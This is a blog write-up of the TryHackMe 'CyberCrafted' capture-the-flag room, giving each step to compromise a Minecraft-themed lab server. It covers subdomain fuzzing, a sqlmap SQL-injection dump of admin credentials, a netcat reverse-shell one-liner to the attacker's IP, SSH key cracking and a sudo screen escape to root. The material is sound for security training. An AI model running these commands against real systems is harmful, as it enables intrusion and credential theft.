CyberCrafted Walkthrough En | TryHackMe – Write-up

Pwn this pay-to-win Minecraft server!

 

CyberCrafted is a CTF from TryHackMe, Medium level, it requires a fairly extensive enumeration. It remains accessible even for beginners. The escalation of privilege is pretty cool.

  • Français
  • English

infosec_related

Tags

Buy Me a Coffee

Enumeration

Command :

nmap -T5  10.10.235.114

3 ports are openSSH, HTTP, and port 25565which hosts the Minecraft game. 

 

Web enumeration

dirsearch  -u 10.10.181.45

 

Dirsearch gives us the domain name of the website : http://cybercrafted.thm/

 

Adding the domain name to the hosts file.

echo ‘10.10.181.45    cybercrafted.thm’  >> /etc/hosts

Sub-domains enumeration :

Command :

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H “Host: FUZZ.cybercrafted.thm/” -u http://cybercrafted.thm/ -fs 0

There are three subdomains that need to be enumerated with dirsearch. First, they must be added to the host file.

 

Enumeration on vhost (store and admin):

Command :

dirsearch -u http://admin.cybercrafted.thm/

The site http: //admin.cybercrafted.thm/login.php, asks for identifiers that we do not have. In addition, access does not appear to be vulnerable. (no bypass authentication)

 

dirsearch -u http://store.cybercrafted.thm/

 

On the site http: //store.cybercrafted.thm/search.php, we have the possibility to perform a search. This page is vulnerable to sql injection (sqli).

To do this automatically, you must intercept the request for a search in BurpSuite. Once intercepted, it must be saved and used in sqlmap.

Initial command to test the vulnerability :

sqlmap -r req.req

Final command (dump credentials) :

sqlmap -r req.req –dbms=mysql -D webapp -T admin –dump

By copying the hash on the site https://crackstation.net/ , we get the password.

Access to the admin.cybercrafted.thm /login.php site

On the site we have the possibility to enter orders.

Command :

id

Initial foothold

Since you can pass system commands, chances are you can get a reverse_shell.

Command :

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f

Movement lateral www-data- xXUltimateCreeperXx

Once the reverse_shell has been received on nc, we are with the www-data account. In the /home folder is the account xXUltimateCreeperXx, in which a nice private key id_rsa is present.

Command :

ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa

The private key is encrypted by a passphrase. To decipher it, you have to use ssh2john. Before, we will copy it locally to kali.

 

Command :

scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/

Command to crack the key : 

ssh2john id_rsa > id_rsa.hash

john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt

 

Movement lateral xXUltimateCreeperXx - cybercrafted

Once on the xXUltimateCreeperXx account and in view of the questions asked by tryhackme, you have to find the location of the Minecraft games.

It is in /opt (nothing too rocket science)

After listing the subfolders and files, the password for the cybercrafted account can be found in the following path /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt

Command to switch to cybercrafted account :

su cybercrafted

 

Privilege Escalation:

First command to made : 

sudo -l

 

The user has root rights to execute the command /usr/bin/screen -r cybercrafted

Command

sudo /usr/bin/screen -r cybercrafted

And we get this window :

 

To switch to the root account, you have to make these keyboard shortcuts.

crtl a then do ctrl c

#

That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

Hope he got you more and taught you new things.

Please feel free to leave a comment or share this article.

Facebook
Twitter
LinkedIn
Pinterest